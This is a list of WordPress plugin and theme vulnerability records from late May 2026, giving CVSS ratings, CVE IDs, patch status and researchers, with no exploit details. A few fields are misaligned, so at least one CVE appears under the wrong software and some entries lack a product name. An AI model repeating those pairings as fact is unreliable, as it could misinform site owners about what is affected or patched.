8.1 (High)

CVE-ID

CVE-2025-69168

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Spike – Volleyball Sports WordPress Theme [spike]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-58707

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Spin – Cricket Team Sports WordPress Theme + AI [spin]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69173

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

tipsy [tipsy]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69149

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Top Dog [top-dog]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69178

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Truemag [truemag]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69136

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Wanium – A Elegant Multi-Concept Theme [wanium]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-42757

Patch Status
Patched

Published
May 30, 2026

Affected Software

WebinarIgnition – Live, Automated & Evergreen Webinar System also for WooCommerce [webinar-ignition]

Researcher

CVSS Rating
8.1 (High)

CVE-ID

CVE-2025-69163

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

WineShop – Food & Wine Store WordPress Theme [wineshop]

Researcher

Louis Deschanel (JeanJeanLeHaxor)

CVSS Rating
8.1 (High)

CVE-ID

CVE-2026-6455

Patch Status
Patched

Published
May 27, 2026

Affected Software

WP Contact Form 7 DB Handler [wp-contact-form-7-db-handler]

Researchers

Pascal SUN

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-7797

Patch Status
Patched

Published
May 27, 2026

Affected Software

Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin [simply-schedule-appointments]

Researcher

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-42747

Patch Status
Patched

Published
May 28, 2026

Affected Software

Easy Form Builder by WhiteStudio — Drag & Drop Form Builder [easy-form-builder]

Researcher

CVSS Rating
7.5 (High)

CVE-ID

CVE-2025-69130

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Entrepreneur – Booking for Small Businesses WordPress Theme [entrepreneurx]

Researcher

CVSS Rating
7.5 (High)

Patch Status
Patched

Published
May 28, 2026

Affected Software

GEO my WP [geo-my-wp]

Researcher(s): Unknown

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-9757

Patch Status
Patched

Published
May 29, 2026

Affected Software

GEO my WP [geo-my-wp]

Researcher

Naoya Takahashi (nakko)

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-9200

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Query Shortcode [query-shortcode]

Researcher

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-45439

Patch Status
Patched

Published
May 26, 2026

Affected Software

Realtyna Organic IDX plugin + WPL Real Estate [real-estate-listing-realtyna-wpl]

Researcher

ParkHyunWoo

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-48972

Patch Status
Patched

Published
May 27, 2026

Affected Software

SeedProd Pro [seedprod-coming-soon-pro-5]

Researcher

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-7459

Patch Status
Patched

Published
May 29, 2026

Affected Software

Simple History – Track, Log, and Audit WordPress Changes [simple-history]

Researcher

lhking

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-39661

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

sw_core [sw_core]

Researcher

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-42755

Patch Status
Patched

Published
May 30, 2026

Affected Software

TableOn – WordPress Posts Table Filterable [posts-table-filterable]

Researcher

CVSS Rating
7.5 (High)

CVE-ID

CVE-2026-42740

Patch Status
Patched

Published
May 28, 2026

Affected Software

Tainacan [tainacan]

Researcher

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-42739

Patch Status
Patched

Published
May 28, 2026

Affected Software

Advanced IP Blocker [advanced-ip-blocker]

Researcher

Peng Zhou

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-42759

Patch Status
Patched

Published
May 30, 2026

Affected Software

Affiliate Super Assistent [amazonsimpleadmin]

Researcher

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-6169

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

affiliate-toolkit – Multi-Network Affiliate & Amazon Product Display [affiliate-toolkit-starter]

Researcher

Nguyen Quang Truong

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-27407

Patch Status
Patched

Published
May 28, 2026

Affected Software

AI Engine – The Chatbot, AI Framework & MCP for WordPress [ai-engine]

Researcher

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-39447

Patch Status
Patched

Published
May 28, 2026

Affected Software

Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin [simply-schedule-appointments]

Researcher

devploit

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-24937

Patch Status
Patched

Published
May 25, 2026

Affected Software

Broadcast Live Video – Live Streaming : WebRTC, HLS, RTSP, RTMP [videowhisper-live-streaming-integration]

Researcher

SSL-6-s0d

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-42754

Patch Status
Patched

Published
May 30, 2026

Affected Software

Favicon by RealFaviconGenerator [favicon-by-realfavicongenerator]

Researcher

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-42734

Patch Status
Patched

Published
May 26, 2026

Affected Software

Geo Mashup [geo-mashup]

Researcher

CVSS Rating
7.2 (High)

CVE-ID

CVE-2025-69151

Patch Status
Unpatched

Published
May 28, 2026

Affected Software

Grand Car Rental | Limousine HTML Template [grandcarrental]

Researcher

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-7052

Patch Status
Patched

Published
May 27, 2026

Affected Software

HT Contact Form – Drag & Drop Form Builder for WordPress [ht-contactform]

Researcher

Azril Fathoni (kiseki)

CVSS Rating
7.2 (High)

CVE-ID

CVE-2025-11262

Patch Status
Patched

Published
May 28, 2026

Affected Software

Link Whisper Free [link-whisper]

Researcher

mikemyers

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-3375

Patch Status
Patched

Published
May 26, 2026

Affected Software

LiteSpeed Cache [litespeed-cache]

Researcher

Post SMTP – Complete Email Deliverability and SMTP Solution with Email Logs, Alerts, Backup SMTP & Mobile App [post-smtp]

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-2374

Patch Status
Patched

Published
May 27, 2026

Affected Software

Researcher

ISMAILSHADOW

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-48838

Patch Status
Patched

Published
May 28, 2026

Affected Software

Researcher

Drew Webber (mcdruid)

CVSS Rating
7.2 (High)

CVE-ID

CVE-2025-69104

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Qreatix – Interactive Portfolio WordPress Theme [qreatix]

Researcher

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-7634

Patch Status
Patched

Published
May 27, 2026

Affected Software

SlimStat Analytics [wp-slimstat]

Researcher

Supakiad S. (m3ez)

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-42738

Patch Status
Patched

Published
May 27, 2026

Affected Software

Smart Online Order for Clover [clover-online-orders]

Researcher

CVSS Rating
7.2 (High)

CVE-ID

CVE-2026-42733

Patch Status
Patched

Published
May 25, 2026

Affected Software

WPCS – WordPress Currency Switcher Professional [currency-switcher]

Researcher

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-49046

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Duplicate Page and Post [duplicate-wp-page-post]

Researcher

Chiao-Lin Yu (Steven Meow)

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-3279

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Enable jQuery Migrate Helper [enable-jquery-migrate-helper]

Researcher

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2025-69135

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Events Schedule – WordPress Events Calendar Plugin [weekly-class]

Researcher

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-5737

Patch Status
Patched

Published
May 27, 2026

Affected Software

Independent Analytics – WordPress Analytics Plugin [independent-analytics]

Researcher

Kirasec

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-3173

Patch Status
Patched

Published
May 27, 2026

Affected Software

Meta Field Block – Display custom fields in the Block Editor without coding [display-a-meta-field-as-block]

Researcher

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-42741

Patch Status
Patched

Published
May 28, 2026

Affected Software

Ninja Forms Views – Display & Edit Ninja Forms Submissions on your site frontend [views-for-ninja-forms]

Researcher

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-39642

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Nyla – A Fresh & Modern WooCommerce Theme [nyla]

Researcher

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-7048

Patch Status
Patched

Published
May 27, 2026

Affected Software

Photo Gallery by 10Web – Mobile-Friendly Image Gallery [photo-gallery]

Researcher

Or Benit

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-48837

Patch Status
Patched

Published
May 26, 2026

Affected Software

Unlimited Elements For Elementor [unlimited-elements-for-elementor]

Researcher

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2026-42742

Patch Status
Patched

Published
May 28, 2026

Affected Software

Views for WPForms – Display & Edit WPForms Entries on your site frontend [views-for-wpforms-lite]

Researcher

CVSS Rating
6.5 (Medium)

CVE-ID

CVE-2025-0898

Patch Status
Patched

Published
May 26, 2026

Affected Software

Xpro Elementor Addons – Pro [xpro-elementor-addons-pro]

Researcher

stealthcopter

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-6427

Patch Status
Patched

Published
May 27, 2026

Affected Software

a3 Lazy Load [a3-lazy-load]

Researcher

theviper17y

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-49044

Patch Status
Patched

Published
May 27, 2026

Affected Software

Advanced Custom Fields: Font Awesome Field [advanced-custom-fields-font-awesome]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8872

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Animate Your Content [animate-your-content]

Researcher

Osvaldo Noe Gonzalez Del Rio (Os) – krei.dev | ogbuilders.io

CVSS Rating
6.4 (Medium)

Patch Status
Patched

Published
May 26, 2026

Affected Software

Animation Addons for Elementor – GSAP Motion Elementor Addons & Website Templates [animation-addons-for-elementor]

Researcher

CVSS Rating
6.4 (Medium)

Patch Status
Patched

Published
May 26, 2026

Affected Software

Animation Addons for Elementor – GSAP Motion Elementor Addons & Website Templates [animation-addons-for-elementor]

Researcher

Osvaldo Noe Gonzalez Del Rio (Os) – krei.dev | ogbuilders.io

CVSS Rating
6.4 (Medium)

Patch Status
Patched

Published
May 26, 2026

Affected Software

Animation Addons for Elementor – GSAP Motion Elementor Addons & Website Templates [animation-addons-for-elementor]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8899

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Auto Thumbnails [automatic-thumbnail]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2025-14042

Patch Status
Patched

Published
May 28, 2026

Affected Software

Automotive Car Dealership Business WordPress Theme [automotive]

Researcher

Mateusz Gierblinski

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8891

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

BitForm – Data management solution for WordPress [bitform]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-42751

Patch Status
Patched

Published
May 29, 2026

Affected Software

Booking Manager – Sync WP Booking Calendar – Import Events, Export Bookings to ICS Calendar [booking-manager]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8873

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Content Slideshow [content-slideshow]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8698

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Cryptocurrency Prijsvergelijking Widget [cryptocurrency-prijsvergelijking-widget]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8847

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Dideo [wp-dideo]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8875

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Easy Prism Syntax Highlighter [easy-prism-syntax-highlighter]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8703

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Endless Scroll [endless-scroll]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8898

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Events In City [events-in-city]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8040

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

faq shortocde [faq-shortcode]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8871

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Formidable Kinetic [formidable-kinetic]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8702

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

GBI To Print [gbi-to-print]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-27427

Patch Status
Patched

Published
May 26, 2026

Affected Software

Geo Mashup [geo-mashup]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8042

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Github Shortcode [github-shortcode]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8701

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

GNTT Post Title Ticker [gntt-post-title-ticker]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8842

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Google+ Link Name [google-plus-name-link-popup-badge]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8886

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

hk_shortcode [hk-shortcode]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8884

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Instant-Quote.co Quotation Page [iq-quotation-page]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8845

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Islamic Database [islamic-database]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8894

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

iWR Tooltip [iwr-tooltip]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8866

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

jQuery googleslides [jquery-googleslides]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8887

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Listen Shortcode [listen-shortcode]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-3897

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Livemesh Addons for Beaver Builder [addons-for-beaver-builder]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-3896

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Livemesh SiteOrigin Widgets [livemesh-siteorigin-widgets]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-9644

Patch Status
Patched

Published
May 27, 2026

Affected Software

LiveSmart Video Chat Live Video Chat [new-dev-livesmart-video-chat]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-48968

Patch Status
Patched

Published
May 27, 2026

Affected Software

Master Slider – Responsive Touch Slider [master-slider]

Researcher

Peter Thaleikis

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-42688

Patch Status
Patched

Published
May 26, 2026

Affected Software

Modula Image Gallery – Photo Grid & Video Gallery [modula-best-grid-gallery]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8869

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Mutual Funds Data [mutual-funds-data]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8048

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

My Email Shortcode [my-email-shortcode]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8867

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Post Categories Gallery [post-category-gallery]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8844

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Responsive Check [responsive-checker-real-time]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8877

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Responsive Video Embedder [responsive-video-embedder]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-4334

Patch Status
Patched

Published
May 27, 2026

Affected Software

Shariff Wrapper [shariff]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8897

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Shortcode Buddy [shortcode-buddy]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-9714

Patch Status
Patched

Published
May 28, 2026

Affected Software

Simple Divi Shortcode [simple-divi-shortcode]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8868

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Single Mailchimp [single-mailchimp]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-9022

Patch Status
Patched

Published
May 26, 2026

Affected Software

Splide Carousel Block [splide-carousel]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-6275

Patch Status
Patched

Published
May 28, 2026

Affected Software

StatCounter – Free Real Time Visitor Stats [official-statcounter-plugin-for-wordpress]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-6565

Patch Status
Patched

Published
May 26, 2026

Affected Software

Style Kits for Elementor [analogwp-templates]

Researchers

Itthidej Aramsri (Boeing777)

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8870

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Team Master – A Modern WordPress Team Showcase [team-master]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2025-62745

Patch Status
Unpatched

Published
May 25, 2026

Affected Software

Team Showcase [team]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-9243

Patch Status
Patched

Published
May 28, 2026

Affected Software

The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce [the-plus-addons-for-elementor-page-builder]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8846

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Tuxquote [tuxquote]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-8837

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

WP Iframe Geo Style for Amazon affiliates [wp-iframe-geo-style-for-amazon-affiliates]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-2030

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

WPBakery Page Builder Addons by Livemesh [addons-for-visual-composer]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-3895

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

WPBakery Page Builder Addons by Livemesh [addons-for-visual-composer]

Researcher

CVSS Rating
6.4 (Medium)

CVE-ID

CVE-2026-42750

Patch Status
Patched

Published
May 29, 2026

Affected Software

WPComplete [wpcomplete]

Researcher

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2026-7660

Patch Status
Patched

Published
May 27, 2026

Affected Software

Easy Updates Manager [stops-core-theme-and-plugin-updates]

Researcher

Dmitrii Ignatyev

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2025-22741

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Felan Framework [felan-framework]

Researcher

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2026-3001

Patch Status
Patched

Published
May 26, 2026

Affected Software

Gutenverse – WordPress Blocks, Page Builder & Site Editor [gutenverse]

Researcher

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2026-3349

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

MinhNhut Link Gateway [minhnhut-link-gateway]

Researcher

Abdulsamad Yusuf (0xVenus)

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2026-8707

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

NS Product icon badge [product-icon-badge]

Researcher

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2025-69140

Patch Status
Patched

Published
May 26, 2026

Affected Software

Sweet Date Core [sweetdate-core]

Researcher

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2026-8911

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

WP AutoBuzz [wp-autobuzz]

Researcher

CVSS Rating
6.1 (Medium)

CVE-ID

CVE-2026-8906

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

WP Promoter [wp-promoter]

Researcher

CVSS Rating
5.4 (Medium)

CVE-ID

CVE-2026-6287

Patch Status
Patched

Published
May 26, 2026

Affected Software

ShopLentor – All-in-One WooCommerce Growth & Store Enhancement Plugin [woolentor-addons]

Researcher

ammonia

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-42752

Patch Status
Patched

Published
May 29, 2026

Affected Software

Accept Stripe Payments [stripe-payments]

Researcher

Sarawut Poolkhet (MisterHelloz)

CVSS Rating
5.3 (Medium)

Patch Status
Patched

Published
May 27, 2026

Affected Software

Advanced Custom Fields (ACF®) [advanced-custom-fields]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-8382

Patch Status
Patched

Published
May 30, 2026

Affected Software

Advanced Custom Fields (ACF®) [advanced-custom-fields]

Researcher

Sarawut Poolkhet (MisterHelloz)

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-7493

Patch Status
Patched

Published
May 26, 2026

Affected Software

Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin [simply-schedule-appointments]

Researcher

lucky_buddy

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-6937

Patch Status
Patched

Published
May 27, 2026

Affected Software

Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin [simply-schedule-appointments]

Researcher

winrace

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-24592

Patch Status
Patched

Published
May 25, 2026

Affected Software

Auto Affiliate Links [wp-auto-affiliate-links]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-42736

Patch Status
Patched

Published
May 27, 2026

Affected Software

Better Messages – Chat Rooms, Group Chat, Private Messages & AI Chat Bots [bp-better-messages]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-2128

Patch Status
Patched

Published
May 28, 2026

Affected Software

Breeze Cache [breeze]

Researcher

Muni Nitish Kumar Yaddala (Stranger825)

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-42411

Patch Status
Patched

Published
May 28, 2026

Affected Software

CloudSecure WP Security [cloudsecure-wp-security]

Researcher

0xzenko

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-9189

Patch Status
Patched

Published
May 28, 2026

Affected Software

Contact Form 7 – PayPal & Stripe Add-on [contact-form-7-paypal-add-on]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-25426

Patch Status
Patched

Published
May 26, 2026

Affected Software

E-cab Taxi Booking Manager for Woocommerce [ecab-taxi-booking-manager]

Researcher

Bao – BlueRock

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-49053

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

ElementsKit Elementor Addons – Advanced Widgets & Templates Addons for Elementor [elementskit-lite]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-45441

Patch Status
Patched

Published
May 26, 2026

Affected Software

Event Booking Manager for WooCommerce [mage-eventpress]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-24546

Patch Status
Patched

Published
May 25, 2026

Affected Software

GamiPress – Gamification plugin to reward points, achievements, badges & ranks in WordPress [gamipress]

Researcher

bosz

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-7552

Patch Status
Patched

Published
May 27, 2026

Affected Software

Geo Mashup [geo-mashup]

Researcher

t0ann9uy3n

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-42735

Patch Status
Patched

Published
May 26, 2026

Affected Software

KiviCare – Clinic & Patient Management System (EHR) [kivicare-clinic-management-system]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-42743

Patch Status
Patched

Published
May 28, 2026

Affected Software

Masteriyo LMS – LMS Course Builder, Quizzes & Certificates [learning-management-system]

Researcher

HieuPenguin

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-39655

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

Mayosis Core [mayosis-core]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-24590

Patch Status
Patched

Published
May 26, 2026

Affected Software

Paid Videochat Turnkey Site – HTML5 PPV Live Webcams [ppv-live-webcams]

Researcher

ChuongVN

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-42744

Patch Status
Patched

Published
May 28, 2026

Affected Software

Quads Ads Manager for Google AdSense [quick-adsense-reloaded]

Researcher

Bas Albers

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2025-12714

Patch Status
Patched

Published
May 28, 2026

Affected Software

Rank Math SEO – AI SEO Tools to Dominate SEO Rankings [seo-by-rank-math]

Researchers

mikemyers

abrahack

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-27398

Patch Status
Patched

Published
May 25, 2026

Affected Software

RSVP and Event Management [rsvp]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-27357

Patch Status
Patched

Published
May 25, 2026

Affected Software

Search Analytics for WP [search-analytics]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-42763

Patch Status
Patched

Published
May 26, 2026

Affected Software

SePay Gateway [sepay-gateway]

Researcher

ParkHyunWoo

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-42745

Patch Status
Patched

Published
May 28, 2026

Affected Software

Smart Online Order for Clover [clover-online-orders]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-42746

Patch Status
Patched

Published
May 28, 2026

Affected Software

Smart Online Order for Clover [clover-online-orders]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-25425

Patch Status
Patched

Published
May 28, 2026

Affected Software

User Registration & Membership – Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder [user-registration]

Researcher

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-7651

Patch Status
Patched

Published
May 27, 2026

Affected Software

User Registration & Membership – Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder [user-registration]

Researcher

Supakiad S. (m3ez)

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-42753

Patch Status
Patched

Published
May 29, 2026

Affected Software

WCFM Membership – WooCommerce Memberships for Multivendor Marketplace [wc-multivendor-membership]

Researcher

0xzenko

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-9014

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

WP Promoter [wp-promoter]

Researcher

Maurice Fielenbach (Hexastrike)

CVSS Rating
5.3 (Medium)

CVE-ID

CVE-2026-48835

Patch Status
Patched

Published
May 28, 2026

Affected Software

WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More [wpforms-lite]

Researcher

Cyrille COQUARD

CVSS Rating
4.9 (Medium)

CVE-ID

CVE-2026-7618

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

EnvíaloSimple: Email Marketing y Newsletters [envialosimple-email-marketing-y-newsletters-gratis]

Researcher

CVSS Rating
4.9 (Medium)

CVE-ID

CVE-2026-10039

Patch Status
Patched

Published
May 28, 2026

Affected Software

Frontend Admin by DynamiApps [acf-frontend-form-element]

Researchers

Louis Deschanel (JeanJeanLeHaxor)

Pascal SUN

CVSS Rating
4.8 (Medium)

CVE-ID

CVE-2026-2288

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

myLinksDump [mylinksdump]

Researcher

CVSS Rating
4.8 (Medium)

CVE-ID

CVE-2026-2280

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

rexCrawler [rexcrawler]

Researcher

CVSS Rating
4.7 (Medium)

CVE-ID

CVE-2026-49059

Patch Status
Unpatched

Published
May 27, 2026

Affected Software

Meta for WooCommerce [facebook-for-woocommerce]

Researcher

CVSS Rating
4.4 (Medium)

CVE-ID

CVE-2026-3348

Patch Status
Unpatched

Published
May 26, 2026

Affected Software

MinhNhut Link Gateway [minhnhut-link-gateway]

Researcher

CVSS Rating
4.4 (Medium)

CVE-ID

CVE-2026-7430

Patch Status
Patched

Published
May 28, 2026

Affected Software

Post Snippets – Custom WordPress Code Snippets Customizer [post-snippets]

Researcher

a1batr0ss

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-8682

Patch Status
Patched

Published
May 27, 2026

Affected Software

3D Viewer – 3D Model Viewer – Augmented Reality – Virtual Try On [ar-vr-3d-model-try-on]

Researcher

CVSS Rating
4.3 (Medium)

CVE-ID

CVE-2026-49045

Patch Status
